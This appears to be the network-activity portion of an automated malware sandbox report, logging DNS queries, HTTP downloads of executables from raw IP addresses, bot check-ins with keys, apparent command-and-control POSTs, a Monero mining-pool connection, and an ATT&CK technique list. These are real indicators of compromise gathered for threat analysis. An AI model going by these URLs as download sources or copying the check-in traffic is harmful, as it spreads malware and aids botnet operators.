172.75.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.75.67.172.in-addr.arpa

IN PTR

Response
DNS

121.72.236.156.in-addr.arpa

Remote address:

8.8.8.8:53

Request

121.72.236.156.in-addr.arpa

IN PTR

Response
DNS

254.111.26.67.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.111.26.67.in-addr.arpa

IN PTR

Response
DNS

142.33.222.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

142.33.222.23.in-addr.arpa

IN PTR

Response

142.33.222.23.in-addr.arpa

IN PTR

a23-222-33-142deploystaticakamaitechnologiescom
DNS

amadapi.tuktuk.ug

vbc.exe

Remote address:

8.8.8.8:53

Request

amadapi.tuktuk.ug

IN A

Response

amadapi.tuktuk.ug

IN A

85.209.3.13
DNS

69.121.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

69.121.18.2.in-addr.arpa

IN PTR

Response

69.121.18.2.in-addr.arpa

IN PTR

a2-18-121-69deploystaticakamaitechnologiescom
DNS

13.3.209.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.3.209.85.in-addr.arpa

IN PTR

Response
DNS

app.nnnaajjjgc.com

ss41.exe

Remote address:

8.8.8.8:53

Request

app.nnnaajjjgc.com

IN A

Response

app.nnnaajjjgc.com

IN A

154.221.26.108
GET

http://app.nnnaajjjgc.com/check/safe

ss41.exe

Remote address:

154.221.26.108:80

Request

GET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 10 Sep 2023 22:24:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
POST

http://app.nnnaajjjgc.com/check/?sid=178268&key=465b11cbde5df8fc23fe7106adf541ff

ss41.exe

Remote address:

154.221.26.108:80

Request

POST /check/?sid=178268&key=465b11cbde5df8fc23fe7106adf541ff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 160
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 10 Sep 2023 22:24:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
GET

http://app.nnnaajjjgc.com/check/safe

ss41.exe

Remote address:

154.221.26.108:80

Request

GET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 10 Sep 2023 22:24:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
POST

http://app.nnnaajjjgc.com/check/?sid=178290&key=5b9c77bf87b017a9685d804761b9310b

ss41.exe

Remote address:

154.221.26.108:80

Request

POST /check/?sid=178290&key=5b9c77bf87b017a9685d804761b9310b HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 160
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 10 Sep 2023 22:24:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
DNS

108.26.221.154.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.26.221.154.in-addr.arpa

IN PTR

Response
GET

http://79.137.192.18/latestX.exe

Remote address:

79.137.192.18:80

Request

GET /latestX.exe HTTP/1.1
Host: 79.137.192.18

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:24:51 GMT
Content-Type: application/octet-stream
Content-Length: 5874968
Last-Modified: Sun, 06 Aug 2023 06:35:01 GMT
Connection: keep-alive
ETag: "64cf3f15-59a518"
Accept-Ranges: bytes
DNS

38.148.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

38.148.119.40.in-addr.arpa

IN PTR

Response
DNS

90.65.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.65.42.20.in-addr.arpa

IN PTR

Response
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

194.169.175.127
POST

http://host-host-file8.com/

Remote address:

194.169.175.127:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wpnof.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 126
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Sun, 10 Sep 2023 22:26:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
DNS

127.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.175.169.194.in-addr.arpa

IN PTR

Response
DNS

lpls.tuktuk.ug

Remote address:

8.8.8.8:53

Request

lpls.tuktuk.ug

IN A

Response

lpls.tuktuk.ug

IN A

95.214.27.254
GET

http://lpls.tuktuk.ug/bot/regex

Remote address:

95.214.27.254:80

Request

GET /bot/regex HTTP/1.1
Host: lpls.tuktuk.ug
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.17.10 (Ubuntu)
Date: Sun, 10 Sep 2023 22:26:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
GET

http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=TTZJAMVI\Admin

Remote address:

95.214.27.254:80

Request

GET /bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=TTZJAMVI\Admin HTTP/1.1
Host: lpls.tuktuk.ug
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.17.10 (Ubuntu)
Date: Sun, 10 Sep 2023 22:26:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
GET

http://lpls.tuktuk.ug/bot/regex

Remote address:

95.214.27.254:80

Request

GET /bot/regex HTTP/1.1
Host: lpls.tuktuk.ug
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.17.10 (Ubuntu)
Date: Sun, 10 Sep 2023 22:27:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
GET

http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=TTZJAMVI\Admin

Remote address:

95.214.27.254:80

Request

GET /bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=TTZJAMVI\Admin HTTP/1.1
Host: lpls.tuktuk.ug
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.17.10 (Ubuntu)
Date: Sun, 10 Sep 2023 22:27:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
DNS

xmr.2miners.com

Remote address:

8.8.8.8:53

Request

xmr.2miners.com

IN A

Response

xmr.2miners.com

IN A

162.19.139.184
DNS

184.139.19.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

184.139.19.162.in-addr.arpa

IN PTR

Response

184.139.19.162.in-addr.arpa

IN PTR

p062minerscom
POST

http://5.42.65.80/8bmeVwqx/index.php

Remote address:

5.42.65.80:80

Request

POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 10 Sep 2023 22:27:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

77.91.68.29:80

http://77.91.68.29/fks/

http

1.5kB
848 B
9
9

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.124.231:80

156 B
3
77.91.68.29:80

http://77.91.68.29/fks/

http

704 B
512 B
7
6

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.124.231:80

156 B
3
77.91.68.29:80

http://77.91.68.29/fks/

http

4.6kB
4.1kB
22
21

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.68.78:80

http://77.91.68.78/lend/build.exe

http

57.6kB
1.7MB
1090
1230

HTTP Request

GET http://77.91.68.78/lend/xk555wjbvnhf3f.exe

HTTP Response

200

HTTP Request

GET http://77.91.68.78/lend/build.exe

HTTP Response

200
79.137.192.18:80

http://79.137.192.18/rockas.exe

http

3.8kB
209.2kB
80
153

HTTP Request

GET http://79.137.192.18/rockas.exe

HTTP Response

200
162.33.179.91:80

http

D8F8.exe

1.1MB
15.3kB
826
201
5.42.65.80:80

http://5.42.65.80/8bmeVwqx/index.php

http

oneetx.exe

198.3kB
5.5MB
4173
4142

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

GET http://5.42.65.80/ss41.exe

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

GET http://5.42.65.80/toolspub2.exe

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

GET http://5.42.65.80/31839b57a4f11171d6abc8bbc4451ee4.exe

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200
176.123.9.85:16482

vbc.exe

1.1MB
14.6kB
827
183
156.236.72.121:443

https://z.nnnaajjjgc.com/sts/imagd.jpg

tls, http

ss41.exe

52.5kB
1.6MB
1132
1129

HTTP Request

GET https://z.nnnaajjjgc.com/sts/imagd.jpg

HTTP Response

200
95.214.27.254:80

http://95.214.27.254/getfile/msedge.exe

http

oneetx.exe

392.2kB
11.4MB
8183
8167

HTTP Request

GET http://95.214.27.254/getfile/taskhost.exe

HTTP Response

200

HTTP Request

GET http://95.214.27.254/getfile/winlog.exe

HTTP Response

200

HTTP Request

GET http://95.214.27.254/getfile/msedge.exe

HTTP Response

200
172.67.75.172:443

https://api.ip.sb/ip

tls, http

sc.exe

704 B
3.8kB
8
7

HTTP Request

GET https://api.ip.sb/ip

HTTP Response

200
85.209.3.13:11290

amadapi.tuktuk.ug

powershell.exe

3.0MB
25.6kB
2179
454
154.221.26.108:80

http://app.nnnaajjjgc.com/check/?sid=178290&key=5b9c77bf87b017a9685d804761b9310b

http

ss41.exe

2.2kB
1.8kB
19
17

HTTP Request

GET http://app.nnnaajjjgc.com/check/safe

HTTP Response

200

HTTP Request

POST http://app.nnnaajjjgc.com/check/?sid=178268&key=465b11cbde5df8fc23fe7106adf541ff

HTTP Response

200

HTTP Request

GET http://app.nnnaajjjgc.com/check/safe

HTTP Response

200

HTTP Request

POST http://app.nnnaajjjgc.com/check/?sid=178290&key=5b9c77bf87b017a9685d804761b9310b

HTTP Response

200
85.209.3.13:11290

amadapi.tuktuk.ug

vbc.exe

3.0MB
23.3kB
2177
394
79.137.192.18:80

http://79.137.192.18/latestX.exe

http

201.0kB
6.0MB
4346
4331

HTTP Request

GET http://79.137.192.18/latestX.exe

HTTP Response

200
85.209.3.13:11290

amadapi.tuktuk.ug

3.0MB
22.0kB
2177
363
85.209.3.13:11290

amadapi.tuktuk.ug

3.0MB
33.6kB
2168
613
194.169.175.127:80

http://host-host-file8.com/

http

665 B
362 B
6
4

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200
95.214.27.254:80

http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=TTZJAMVI\Admin

http

1.0kB
2.2kB
10
12

HTTP Request

GET http://lpls.tuktuk.ug/bot/regex

HTTP Response

200

HTTP Request

GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=TTZJAMVI\Admin

HTTP Response

200

HTTP Request

GET http://lpls.tuktuk.ug/bot/regex

HTTP Response

200

HTTP Request

GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=TTZJAMVI\Admin

HTTP Response

200
162.19.139.184:12222

xmr.2miners.com

tls

1.4kB
7.3kB
10
12
5.42.65.80:80

http://5.42.65.80/8bmeVwqx/index.php

http

422 B
327 B
4
3

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200

8.8.8.8:53

135.121.18.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

135.121.18.2.in-addr.arpa
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

43.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

43.229.111.52.in-addr.arpa
8.8.8.8:53

78.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

78.68.91.77.in-addr.arpa
8.8.8.8:53

18.192.137.79.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

18.192.137.79.in-addr.arpa
8.8.8.8:53

z.nnnaajjjgc.com

dns

ss41.exe

62 B
78 B
1
1

DNS Request

z.nnnaajjjgc.com

DNS Response

156.236.72.121
8.8.8.8:53

91.179.33.162.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

91.179.33.162.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

85.9.123.176.in-addr.arpa

dns

71 B
136 B
1
1

DNS Request

85.9.123.176.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

sc.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

172.67.75.172

104.26.12.31

104.26.13.31
8.8.8.8:53

254.27.214.95.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

254.27.214.95.in-addr.arpa
8.8.8.8:53

172.75.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

172.75.67.172.in-addr.arpa
8.8.8.8:53

121.72.236.156.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

121.72.236.156.in-addr.arpa
8.8.8.8:53

254.111.26.67.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

254.111.26.67.in-addr.arpa
8.8.8.8:53

142.33.222.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

142.33.222.23.in-addr.arpa
8.8.8.8:53

amadapi.tuktuk.ug

dns

vbc.exe

63 B
79 B
1
1

DNS Request

amadapi.tuktuk.ug

DNS Response

85.209.3.13
8.8.8.8:53

69.121.18.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

69.121.18.2.in-addr.arpa
8.8.8.8:53

13.3.209.85.in-addr.arpa

dns

70 B
130 B
1
1

DNS Request

13.3.209.85.in-addr.arpa
8.8.8.8:53

app.nnnaajjjgc.com

dns

ss41.exe

64 B
80 B
1
1

DNS Request

app.nnnaajjjgc.com

DNS Response

154.221.26.108
8.8.8.8:53

108.26.221.154.in-addr.arpa

dns

73 B
134 B
1
1

DNS Request

108.26.221.154.in-addr.arpa
8.8.8.8:53

38.148.119.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

38.148.119.40.in-addr.arpa
8.8.8.8:53

90.65.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

90.65.42.20.in-addr.arpa
8.8.8.8:53

host-file-host6.com

dns

65 B
138 B
1
1

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

65 B
81 B
1
1

DNS Request

host-host-file8.com

DNS Response

194.169.175.127
8.8.8.8:53

127.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

127.175.169.194.in-addr.arpa
8.8.8.8:53

lpls.tuktuk.ug

dns

60 B
76 B
1
1

DNS Request

lpls.tuktuk.ug

DNS Response

95.214.27.254
8.8.8.8:53

xmr.2miners.com

dns

61 B
77 B
1
1

DNS Request

xmr.2miners.com

DNS Response

162.19.139.184
8.8.8.8:53

184.139.19.162.in-addr.arpa

dns

73 B
102 B
1
1

DNS Request

184.139.19.162.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery